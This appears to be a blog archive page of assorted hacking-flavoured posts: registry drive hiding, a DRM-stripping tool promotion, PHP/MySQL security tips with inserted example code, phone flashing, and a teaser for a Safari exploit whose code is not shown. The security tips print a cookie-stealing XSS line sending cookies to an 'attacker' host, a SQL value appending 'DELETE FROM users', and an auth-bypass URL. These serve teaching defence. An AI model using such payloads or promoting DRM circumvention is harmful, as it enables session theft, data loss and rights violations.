
Archive for Exploitative

Registry Edit - Hide Specific Hard Drives


Ever wish you could make one of your computer’s drives invisible to anyone snooping around on your system? Well, happy days are here my friend! Whether you have sensitive docs, pictures, or any other private data, this is one of the easiest ways to keep them safe. Keep in mind that you’ll still be able to access your hidden drives; you just won’t see that they exist in Windows Explorer or the My Computer folder. Back up your registry before you start!

1. Open Regedit.

2. Navigate to one of these keys:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer - this only changes the setting for the currently logged-in user

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer - this changes the setting for all users on the machine. You may have to create the key folder “Explorer” manually.

3. In the Explorer key folder, create a new DWORD value by right-clicking Explorer, then choosing New DWORD value. Name the value “NoDrives” (without the quotes). This value defines local and network drive visibility for each logical drive on the computer. All drives will be visible as long as this value’s data is set to 0.

4. Following the table below, enter the decimal number corresponding to the drive(s) you want to hide as the NoDrives value data. When you right-click NoDrives and choose Modify, make sure you select the Decimal base, not Hexadecimal.

Drive        Number to hide
A:           1
B:           2
C:           4
D:           8
E:           16
F:           32
G:           64
H:           128
I:           256
J:           512
K:           1024
L:           2048
M:           4096
N:           8192
O:           16384
P:           32768
Q:           65536
R:           131072
S:           262144
T:           524288
U:           1048576
V:           2097152
W:           4194304
X:           8388608
Y:           16777216
Z:           33554432
All drives   67108863

If you want to hide more than one drive, simply add the numbers for those drives together to get a combined total.

For example, to hide the D: and T: drives, add the decimal value for the D: drive to the decimal value for the T: drive:

8 (D) + 524288 (T) = 524296

To hide all of your drives, set the value to 67108863.

You must reboot your PC to see your changes.

Removing DRM on MP3 Files. FairUse4WM -> FreeMe2


A while back, I purchased a Napster membership. At $14.95 a month I could download all the MP3 files I could find, and listen to them as much as I wanted. No restrictions, right? Wrong. Unless you use their proprietary MP3 player to play the music, you can’t listen to it on any other device. I.e. the iPod. I couldn’t believe it. What an utter crock of shit. I didn’t particularly like iTunes, solely on the fact that I wanted free rein to all the music I could find. Sound wrong? No, I fucking paid what they wanted, now give me my fucking music!

Much to my dismay, Napster instituted a form of DRM protection on their music. This fucking sucks. What am I supposed to do? I bought this subscription purely on the intention of filling my iPod with lots of music to listen to. /sigh indeed.

So I was on a conquest to figure out how I could get this music to play on my iPod. One method was using a Winamp plugin to record the sound card's output and save it to a file. Apparently it took a long time to complete, and was buggy. Great, so what next? The next option was burning all of the files to a CD, then bringing them back to the computer, thus removing the DRM protection. Wow, that’s not going to take for-fucking-ever!

There HAS to be some sort of software to fix this, right? At the time (this was about two years ago) there wasn’t much, honestly. A few proofs of concept here, and a few alphas there. Nothing. Flash forward 6 months, and I stumbled across FairUse4WM, which worked marvelously. Albeit EVERY song was prefixed with a damn FAIRUSE4WM_ tag, which was… annoying to say the least; I dealt with it. It worked fine, and then stopped working, and I gave up. Meh…

Well apparently there is a new kid on the block, for everyone dealing with DRM issues. This will handle not only music files, but video, and even streaming files!

From the Author:

From the author - After many hours of fighting with WM-DRM protection I decided to create a new tool that would allow people to remove it from files and streams. Of course FairUse4WM is a great tool and it works nicely, but there are a few reasons why I have decided to create a new one:
1) FairUse4WM is closed source. Every time MS releases a new version of IBX, people have to make binary patches or start from scratch.
2) FairUse4WM doesn’t work with video streams since it wasn’t intended to. Of course it is possible to record a video stream and then undrm it, but this is pointless when we are talking about TV channels.
3) There is no platform-independent tool for MS WM-DRM. There is no point in running Windows every time you want to undrm some file or stream.

FreeMe2 is the program. It is based on the famous freeme app created by Beale Screamer and on viodentia's (FairUse4WM) findings. It strips WM-DRM protection from wmv/asf/wma files as well as video/audio streams.

Download and info at SourceForge
More Instructions and information at Stream-Recorder.com

Footnote: I canceled my Napster subscription long ago. This rendered my music unusable, and my files were removed. They billed me for another year afterwards, despite repeated complaints to them and the credit card company. Finally it stopped… they gave me $30 back. Fucking morons.

Re-Synching your Dugg post to get more Diggs.


Recently, I was redoing how my permalink structure worked on this blog. My original structure was: index.php/p=%postid. For various, somewhat obvious reasons I wanted this changed.

So I changed it to: index.php/post_title/

Right, so all worked well; I had my new permalink and directory structures all set up, good good. Now, I have a Digg counter and submitter in my post loop, for every one of my posts. After changing my permalink structure, I noticed none of my diggs were showing up! What?! Hmmmm

My most recent post (at the time) I simply dugg again. Went through the routine, submitted it (even though my last post showed up on the duplicate list, the only time that thing has EVER detected ANYTHING remotely close to what I was digging). Finalized my digg, and went back to my page. And reloaded.

What do I see? 6 diggs. That’s what I had before it cleared them out on here. But no more than literally 3-4 minutes later, I had 3 more diggs. Didn’t make much sense; they don’t come in that quick unless I’ve just submitted it. And that’s what happened.

I effectively re-synced my post. I changed the URL of my digg, so none of them showed up. However, once I went and submitted it again, all of my previous diggs for that post reappeared, and the post was back up on top on the Digg site.

Now this wouldn’t be a very effective way to try and get more diggs on a daily basis, however you like your traffic. It could, though, help you if you have a message of particular interest to you that you’d like to see receive more attention.

Meta Keywords Tag 101: How To “Legally” Hide Words On Your Pages For Search Engines.


If there’s anything I particularly hate when it comes to SEO, it’s the meta keywords tag. I so wish it had never been invented. It’s practically useless, yet people still obsess over it. In this article, I’ll explain more about why you shouldn’t worry about it except perhaps for misspellings, as well as which search engines support it.

The meta keywords tag is one of several of meta tags that you can insert into your web pages to provide search engines with information about your pages that isn’t visible on the page itself. For example, my Meta Robots Tag 101: Blocking Spiders, Cached Pages & More article covers how you can use a different meta tag — the meta robots tag — to block pages from being indexed. Users don’t see this information (unless they look at your source code), but search engines do.

I recently read an interesting article that I think may help some people out there with SEO concerns for their major sites and/or blogs. The above is a quote from the article. The link is below:

Link:  Meta Keywords Tag 101: How To “Legally” Hide Words On Your Pages For Search Engines.


14 Security Tips For Developing With PHP and MySQL


PHP MySQL Web Development Security Tips - 14 tips you should know when developing with PHP and MySQL

I read about many of these points in books and tutorials, but I was rather lazy about thinking through many of them initially and learned some of these lessons the hard way. Fortunately I didn't lose any major data over security issues with PHP and MySQL, but my suggestion to everyone who is new to PHP is to read these tips and apply them *before* you end up with a big mess.

1. Do not trust user input

If you are expecting an integer, call intval() (or use a cast); if you don't expect a username to contain a dash (-), check it with strstr() and tell the user that this username is not valid.

Here is an example:

PHP:
  $post_id = intval($_GET['post_id']); // anything that is not a number becomes 0
  mysql_query("SELECT * FROM post WHERE id = $post_id");

Now $post_id is guaranteed to be an integer.

2. Validate user input on the server side

If you are validating user input with JavaScript, be sure to do it on the server side too, because to bypass your JavaScript validation a user only needs to turn JavaScript off.
JavaScript validation is only good for reducing the server load.

3. Do not use user input directly in your SQL queries

Use mysql_real_escape_string() to escape user input.
PHP.net recommends a function like this (slightly adapted here):

PHP:
  function escape($values) {
      if (is_array($values)) {
          /* Escape every element, recursing into nested arrays */
          $values = array_map('escape', $values);
      } else {
          /* Quote unless the value is a plain number; a leading '0' (e.g. "007") stays a quoted string */
          if (!is_numeric($values) || $values[0] === '0') {
              $values = "'" . mysql_real_escape_string($values) . "'";
          }
      }
      return $values;
  }

Then you can use it like this:

PHP:
  $username = escape($_POST['username']);
  mysql_query("SELECT * FROM user WHERE username = $username"); /* escape() also adds the quotes around strings automatically */

4. In your SQL queries don't put integers in quotes

For example, $id is supposed to be an integer:

PHP:
  $id = "0; DELETE FROM users";
  $id = mysql_real_escape_string($id); // still "0; DELETE FROM users": mysql_real_escape_string doesn't escape ';'
  mysql_query("SELECT * FROM users WHERE id='$id'");

Note that, using intval() would fix the problem here.
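Pulling tips 1 to 4 together, here is an added example that is not part of the original post: it validates the two inputs discussed above (an ID and a username) with whitelist patterns and then, going one step beyond the post's escaping approach, hands them to the database as bound parameters of a prepared statement so the data never becomes part of the SQL text at all. It assumes PDO with the SQLite driver is available (the pdo_sqlite extension) and builds a throwaway in-memory table with constructed rows so it runs offline; the function names are the example's own.

```php
<?php
// Added example, not the post's code. Validate first (tips 1 and 2), then keep user data
// out of the SQL string entirely with a prepared statement (a stronger form of tips 3 and 4).
// Assumes the pdo_sqlite extension; the table and rows below are constructed test data.

function validate_post_id($raw) {
    // Accept only a string of digits, so "12abc" and "0; DELETE FROM users" are rejected
    // outright instead of being silently cast to 12 or 0. Returns null on failure.
    if (!is_string($raw) || !preg_match('/^[1-9][0-9]{0,9}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

function validate_username($raw) {
    // The strstr() idea from tip 1 turned into a whitelist: letters, digits and
    // underscore, 3 to 32 characters. A dash or anything else means null (reject).
    if (!is_string($raw) || !preg_match('/^[A-Za-z0-9_]{3,32}$/', $raw)) {
        return null;
    }
    return $raw;
}

function build_demo_db() {
    // Constructed in-memory database standing in for the real MySQL server.
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT NOT NULL)');
    $db->exec("INSERT INTO user (id, username) VALUES (1, 'alice'), (2, 'bob')");
    return $db;
}

function find_user(PDO $db, $username) {
    // The placeholder is sent to the database separately from the data, so quoting
    // and escaping are no longer the application's job; the value is always a literal.
    $stmt = $db->prepare('SELECT id, username FROM user WHERE username = :u');
    $stmt->execute(array(':u' => $username));
    return $stmt->fetch(PDO::FETCH_ASSOC); // false when no row matches
}

// Constructed inputs standing in for $_GET / $_POST values.
$inputs = array(
    'post_id'  => '42',
    'bad_id'   => '0; DELETE FROM users',
    'username' => 'alice',
    'bad_user' => "alice' OR '1'='1",
);

$db = build_demo_db();

var_dump(validate_post_id($inputs['post_id']));   // an int: safe to use
var_dump(validate_post_id($inputs['bad_id']));    // null: reject the request
var_dump(validate_username($inputs['bad_user'])); // null: reject the request

$user = validate_username($inputs['username']);
print_r(find_user($db, $user));                   // the row for alice

// Even if validation were skipped, the bound parameter is compared as one literal
// string, so the quote-and-OR input simply matches no user.
var_dump(find_user($db, $inputs['bad_user']));
```

Validation and parameterisation are complementary: the whitelist gives early, specific error messages and keeps junk out of the database, while the prepared statement guarantees that whatever does reach the query cannot change its structure.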

5. Always escape the output

This will prevent XSS (Cross Site Scripting) attacks. Imagine you receive and save some data from a user and want to display it on a web page later (maybe his/her bio or username), and the user puts this bit of code in the input field along with his bio:

JAVASCRIPT:
  <script>alert('');</script>

If you display the raw user input on a web page this will be very ugly, it can even be worse if a user inputs this code instead:

JAVASCRIPT:
  <script>document.location.replace('http://attacker/?c='+document.cookie);</script>

With this, an attacker can steal cookies from whoever visits that certain page (containing bio etc.) and this includes session cookies with session IDs in them so the attacker can hijack your users' sessions and appear to be logged in as other users.

When displaying user input on a page, use htmlentities($user_bio, ENT_QUOTES, 'UTF-8');
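As an added example (not code from the original post), the following renders the same user-supplied bio in three different output contexts. The HTML body and attribute cases are what the htmlentities() call above covers; the inline-script case goes beyond the post, because HTML escaping alone is the wrong tool once the value lands inside a <script> block, and json_encode() with the JSON_HEX_* flags is used there instead. The $bio value is a constructed sample carrying the cookie-stealing payload quoted above, and the function names are the example's own.

```php
<?php
// Added example, not the post's code: context-aware output escaping.
// $bio below is a constructed sample input carrying the payload quoted in the post.

function esc_html($s) {
    // HTML body text and double-quoted attribute values. ENT_QUOTES escapes both quote
    // characters, ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning "".
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function esc_js($s) {
    // Inside <script>, emit a JSON string literal. The HEX flags turn < > & ' " into
    // \uXXXX escapes so the value cannot close the script element early or break out
    // of the string.
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

function render_profile($username, $bio) {
    // Each interpolation uses the escaper for the context it is placed in.
    return "<h1>" . esc_html($username) . "</h1>\n"
         . "<p title=\"" . esc_html($bio) . "\">" . esc_html($bio) . "</p>\n"
         . "<script>var bio = " . esc_js($bio) . ";</script>\n";
}

// Constructed sample: the payload from the post saved as a "bio".
$bio = "<script>document.location.replace('http://attacker/?c='+document.cookie);</script>";

echo render_profile('mallory', $bio);
```

In the output the bio appears as inert text in the paragraph and title attribute, and as a plain JavaScript string in the script block; no part of it is parsed as markup or code. The rule of thumb this illustrates: escape at the point of output, and pick the escaper by where the value lands, not by where it came from.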

6. When uploading files, validate the file mime type

If you are expecting images, make sure the file you are receiving is an image or it might be a PHP script that can run on your server and does whatever damage you can imagine.

One quick way is to check the file extension:

PHP:
  $valid_extensions = array('jpg', 'gif', 'png'); // ...

  $file_name  = basename($_FILES['userfile']['name']);
  $_file_name = explode('.', $file_name);
  $ext        = strtolower($_file_name[count($_file_name) - 1]); // compare case-insensitively ("JPG" counts as "jpg")

  if (!in_array($ext, $valid_extensions)) {
      /* This file is invalid: reject the upload here */
  }

Note that validating the extension is a very simple way, and not the best way, to validate file uploads, but it's effective,
simply because unless you have set your server to interpret .jpg files as PHP scripts, you are fine.
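The tip's heading talks about the MIME type while its code checks only the extension. Here is an added example (not the post's code) that does both and a little more: it whitelists the extension, sniffs the MIME type from the file's bytes rather than trusting the client-supplied $_FILES['userfile']['type'], confirms the file parses as an image with sane dimensions, and stores it under a random name so the client's filename is never reused. It assumes the fileinfo extension and PHP 7 (for random_bytes); the 1x1 GIF and the PHP text disguised as "photo.gif" are constructed inputs written to the temp directory so the script runs offline without a real upload. The function names are the example's own.

```php
<?php
// Added example, not the post's code: layered validation of an uploaded "image".
// Assumes the fileinfo extension and PHP 7+. In a real handler the paths would come
// from $_FILES['userfile']['tmp_name'] and the accepted file would be copied with
// move_uploaded_file(); here two constructed files stand in for the upload.

$allowed = array(
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'gif' => 'image/gif',
);

function check_upload($tmp_path, $client_name, array $allowed) {
    // 1. Extension whitelist (the post's check), case-insensitive, last component only,
    //    so "shell.php.gif" is judged by "gif" and then has to pass the content checks.
    $ext = strtolower(pathinfo($client_name, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return 'extension not allowed';
    }
    // 2. MIME type detected from the bytes, not from the client's Content-Type.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmp_path);
    if ($mime !== $allowed[$ext]) {
        return "content is $mime, not {$allowed[$ext]}";
    }
    // 3. It must actually parse as an image, with dimensions that are not absurd
    //    (a decompression-bomb guard; the 8192 limit is an arbitrary example value).
    $info = @getimagesize($tmp_path);
    if ($info === false || $info[0] < 1 || $info[1] < 1 || $info[0] > 8192 || $info[1] > 8192) {
        return 'not a usable image';
    }
    return null; // null means the file passed every check
}

function safe_target_name($client_name) {
    // Never reuse the client-supplied name: random name plus the whitelisted extension.
    $ext = strtolower(pathinfo($client_name, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed inputs: a real 1x1 GIF, and a PHP file submitted under an image name.
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));
$fake = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($fake, "<?php echo 'this is not an image'; ?>");

$err = check_upload($gif, 'holiday.GIF', $allowed);
echo "real gif:   " . ($err === null ? 'accepted, stored as ' . safe_target_name('holiday.GIF') : $err) . "\n";

$err = check_upload($fake, 'photo.gif', $allowed);
echo "php as gif: " . ($err === null ? 'accepted' : 'rejected (' . $err . ')') . "\n";

unlink($gif);
unlink($fake);
```

The second file passes the extension check exactly as the post's snippet would allow, and is caught by the content check because its detected MIME type is not image/gif. Keep the extension check anyway: it is what decides how the web server will later treat the stored file, and the random filename plus a fixed whitelisted extension is what makes that decision predictable.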

7. If you are using 3rd party code libraries, be sure to keep them up to date

If you are using code libraries like Smarty or ADODB etc. be sure to always download the latest version.

8. Give your database users just enough permissions

If a database user is never going to drop tables, then when creating that user don't give it drop table permissions, normally just SELECT, UPDATE, DELETE, INSERT should be enough.

9. Do not allow hosts other than localhost to connect to your database

If you need to, add only that particular host or IP as necessary but never, ever let everyone connect to your database server.

10. Your library file extensions should be PHP

.inc files will be served to the browser just like text files (unless your server is set up to interpret them as PHP scripts), so users will be able to see your messy code (kidding) and possibly find exploits or see your passwords, etc.
Use extensions like config.inc.php, or put a .htaccess file in your include (templates, libs etc.) folders with this one line:

Apache .htaccess:
  Deny from all

11. Have register globals off or define your variables first

Register globals can be very dangerous, consider this bit of code:

PHP:
  if (user_logged_in()) {
      $auth = true;
  }

  if ($auth) {
      /* Do some admin stuff */
  }

Now with register globals on an attacker can view this page like this and bypass your authentication:
http://yourwebsite.com/admin.php?auth=1

If you have register globals on and you can't turn it off for some reason, you can fix these issues by defining your variables first:

PHP:
  $auth = false; // set explicitly, so a request parameter can no longer supply the initial value
  if (user_logged_in()) {
      $auth = true;
  }

  if ($auth) {
      /* Do some admin stuff */
  }

Defining your variables first is a good programming practice that I suggest you follow anyway.

12. Keep PHP itself up to date

Just take a look at www.php.net and see release announcements and note how many security issues they fix on every release to understand why this is important.

13. Read security books

Always look for new books about PHP security to read; you can start by reading the 4th book in the Learning PHP thread, which is one of the best books on PHP security, and the author is a member of the PHP team, so he knows the internals very well.

14. Contribute to this list

Feel free to reply to this post and add to this list, it will be helpful for everyone!

If you find this useful, please Digg it and/or comment!

Unlocked PalmOS Treos can be configured with cricket’s mobile web without a cable.


Related to the last post: when switching to the Cricket network, you will not have web or picture SMS capabilities. The post below over at Howard Forums will give you all of the information you need.

Link:  http://www.howardforums.com/showpost.php?p=9772640&postcount=2

Treo(vzw) 600-650 flashed, and converted to Cricket Mobile.


A lot of people are beginning to take advantage of Cricket Mobile. It's really gaining speed here in San Diego, and has been for quite some time in the more eastern regions of the U.S. Why wouldn't it? The prices are great, there is no contract, unlimited SMS, picture SMS, internet, all kinds of things. Albeit the internet from this network is a joke, but it's generally pretty limited by the phone itself. Which brings me to my next point.

With all of these great prices and deals coming out of Cricket, people often get to the store, or start doing their research. Then they find out the phone selection for Cricket is terrible. The only thing close to a 'cool' or interactive phone is the Kyocera Lingo. The Lingo has a terrible internet display, comes with no serial cable or headphones for driving, and often de-syncs from the Cricket network, causing missed calls, the inability to send SMS messages, and more really weird issues. It breaks very easily, and costs well above what it should ($200.00). But it's arguably the 'best' and most popular phone in their lineup. What can be done about it?

Cricket works on the CDMA cellular network. That means a lot of VZW (Verizon) and SNXTL (Sprint) phones will work (granted, getting internet access on Sprint phones is a bit trickier). The two most common phones to be 'converted' are the Treo 600/650 and the LG enV. This guide is for the Treo 600/650. I may do one for the enV at a later date. Also, it should be said now: you may render your phone useless if caution and patience are not exercised while doing this. But in the end, you will have a PDA on the Cricket network, even though Cricket tells you that just won't work.

Guide just after the break.


W4k1ng offers free dezending service.


If you've ever come across code from a previous PHP programmer and wanted to make a change but couldn't because it had been Zend encoded, you know how frustrating that can be. Programmers can hide back doors, shell code, anything they like, as the code has been fully obfuscated with the Zend encoder.

W4k1ng.net has released an online De-Zending script. Simply submit your Zend encoded files, wait for the file to be decoded, and download your decoded PHP script in a .ZIP file.

Check it out. I've tested it, and it works!

W4k1ng De-Zender 

Apple Mac OS X / Safari “__MACOSX” ZIP archive Remote Code Execution Exploit


This is an interesting and apparently "critical" live exploit for remote code execution through Safari. Below is the Metasploit file.

Exploit code just after the break.
